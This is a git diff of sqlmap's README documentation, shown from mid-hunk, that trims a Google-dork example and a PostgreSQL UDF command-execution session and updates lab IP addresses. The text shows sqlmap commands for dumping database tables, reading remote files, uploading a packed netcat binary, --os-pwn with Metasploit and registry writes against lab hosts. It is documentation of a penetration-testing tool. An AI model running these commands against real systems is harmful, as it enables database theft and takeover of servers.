Cookie header string support, useful when the
web application requires authentication based upon cookies and you have
@@ -1132,33 +1132,6 @@ first 100 results for the Google dork expression with GET
parameters asking you if you want to test and inject on each possible
affected URL.
-Example of Google dorking with expression site:yourdomain.com
-ext:php:
-
-
-$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
-
-[hh:mm:38] [INFO] first request to Google to get the session cookie
-[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
-testable hosts
-[hh:mm:41] [INFO] sqlmap got a total of 59 targets
-[hh:mm:40] [INFO] url 1:
-GET http://yourdomain.com/example1.php?foo=12, do you want to test this
-url? [y/N/q] n
-[hh:mm:43] [INFO] url 2:
-GET http://yourdomain.com/example2.php?bar=24, do you want to test this
-url? [y/N/q] n
-[hh:mm:42] [INFO] url 3:
-GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
-want to test this url? [y/N/q] y
-[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
-[...]
-
-Switch: -c
Rather than using all hosts parsed from provided logs with switch
-l, you can specify valid Python regular expression to be used
for filtering desired ones.
Example usage:
+Example of valid syntax:
@@ -1983,22 +1956,23 @@ database name is not specified, the current database name is used.
You can also provide the -C option to specify the table columns
name like the one you provided to be enumerated.
-Example against a MySQL target:
+Example against a SQLite target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
-T users -C name
[...]
-Database: testdb
+Database: SQLite_masterdb
Table: users
-[2 columns]
-+---------+---------------+
-| Column | Type |
-+---------+---------------+
-| name | varchar(500) |
-| surname | varchar(1000) |
-+---------+---------------+
+[3 columns]
++---------+---------+
+| Column | Type |
++---------+---------+
+| id | INTEGER |
+| name | TEXT |
+| surname | TEXT |
++---------+---------+
@@ -2028,7 +2002,7 @@ database name is used.
-$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
@@ -2208,41 +2182,11 @@ sqlmap can also remove them from the database for you.
These techniques are detailed in the white paper
Advanced SQL injection to operating system full control.
-Example against a PostgreSQL target:
-
-
-
-$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
-how many user-defined functions do you want to create from the shared library? 1
-what is the name of the UDF number 1? sys_eval
-how many input parameters takes UDF 'sys_eval'? (default: 1)
-what is the data-type of input parameter number 1? (default: text)
-what is the data-type of the return value? (default: text)
-do you want to call your injected user-defined functions now? [Y/n/q] y
-which UDF do you want to call?
-[1] sys_eval
-[q] Quit
-> 1
-what is the value of the parameter number 1 (data-type: text)? echo test
-do you want to retrieve the return value of the UDF? [Y/n]
-return value: 'test'
-
-do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] y
-[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
-be deleted manually
-
-
-
+Use switch --udf-inject and follow the instructions.
If you want, you can specify the shared library local file system path
-via command line using --shared-lib option.
+via command line too by using --shared-lib option. Vice
+versa sqlmap will ask you for the path at runtime.
This feature is available only when the database management system is
MySQL or PostgreSQL.
@@ -2271,7 +2215,7 @@ file:
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
@@ -2282,14 +2226,14 @@ back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
-$ ls -l output/192.168.136.131/files/C__example.exe
--rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
+$ ls -l output/192.168.136.129/files/C__example.exe
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
-$ file output/192.168.136.131/files/C__example.exe
-output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+$ file output/192.168.136.129/files/C__example.exe
+output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit
@@ -2320,7 +2264,7 @@ $ file /tmp/nc.exe.packed
$ ls -l /tmp/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
@@ -2483,7 +2427,7 @@ slide deck
-$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
--os-pwn -v 1 --msf-path /tmp/metasploit
[...]
@@ -2552,7 +2496,7 @@ provided key, with --reg-data value data, while with
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
+$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
diff --git a/doc/README.pdf b/doc/README.pdf
index 8652d3735..1a6f6a575 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index 1163863a8..7e3509947 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -1053,31 +1053,6 @@ first 100 results for the Google dork expression with GET
parameters asking you if you want to test and inject on each possible
affected URL.
-
-Example of Google dorking with expression site:yourdomain.com
-ext:php:
-
-
-$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
-
-[hh:mm:38] [INFO] first request to Google to get the session cookie
-[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
-testable hosts
-[hh:mm:41] [INFO] sqlmap got a total of 59 targets
-[hh:mm:40] [INFO] url 1:
-GET http://yourdomain.com/example1.php?foo=12, do you want to test this
-url? [y/N/q] n
-[hh:mm:43] [INFO] url 2:
-GET http://yourdomain.com/example2.php?bar=24, do you want to test this
-url? [y/N/q] n
-[hh:mm:42] [INFO] url 3:
-GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
-want to test this url? [y/N/q] y
-[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
-[...]
- Load options from a configuration INI file
@@ -1355,7 +1330,7 @@ Rather than using all hosts parsed from provided logs with switch
-l, you can specify valid Python regular expression to be used
for filtering desired ones.
-Example usage:
+Example of valid syntax:
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
@@ -2019,21 +1994,22 @@ You can also provide the -C option to specify the table columns
name like the one you provided to be enumerated.
-Example against a MySQL target:
+Example against a SQLite target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
-T users -C name
[...]
-Database: testdb
+Database: SQLite_masterdb
Table: users
-[2 columns]
-+---------+---------------+
-| Column | Type |
-+---------+---------------+
-| name | varchar(500) |
-| surname | varchar(1000) |
-+---------+---------------+
+[3 columns]
++---------+---------+
+| Column | Type |
++---------+---------+
+| id | INTEGER |
+| name | TEXT |
+| surname | TEXT |
++---------+---------+
@@ -2065,7 +2041,7 @@ database name is used.
Example against a Firebird target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
@@ -2267,39 +2243,12 @@ These techniques are detailed in the white paper
name="Advanced SQL injection to operating system full control">.
-Example against a PostgreSQL target:
-
-
-$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
-how many user-defined functions do you want to create from the shared library? 1
-what is the name of the UDF number 1? sys_eval
-how many input parameters takes UDF 'sys_eval'? (default: 1)
-what is the data-type of input parameter number 1? (default: text)
-what is the data-type of the return value? (default: text)
-do you want to call your injected user-defined functions now? [Y/n/q] y
-which UDF do you want to call?
-[1] sys_eval
-[q] Quit
-> 1
-what is the value of the parameter number 1 (data-type: text)? echo test
-do you want to retrieve the return value of the UDF? [Y/n]
-return value: 'test'
-
-do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] y
-[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
-be deleted manually
-
If you want, you can specify the shared library local file system path
-via command line using --shared-lib option.
+via command line too by using --shared-lib option. Vice
+versa sqlmap will ask you for the path at runtime.
This feature is available only when the database management system is
@@ -2332,7 +2281,7 @@ Example against a Microsoft SQL Server 2005 target to retrieve a binary
file:
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
@@ -2343,14 +2292,14 @@ back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
-$ ls -l output/192.168.136.131/files/C__example.exe
--rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
+$ ls -l output/192.168.136.129/files/C__example.exe
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
-$ file output/192.168.136.131/files/C__example.exe
-output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+$ file output/192.168.136.129/files/C__example.exe
+output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit
-$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
--os-pwn -v 1 --msf-path /tmp/metasploit
[...]
@@ -2634,7 +2583,7 @@ provided key, with --reg-data value data, while with
A sample command line for adding a registry key hive follows:
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
+$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1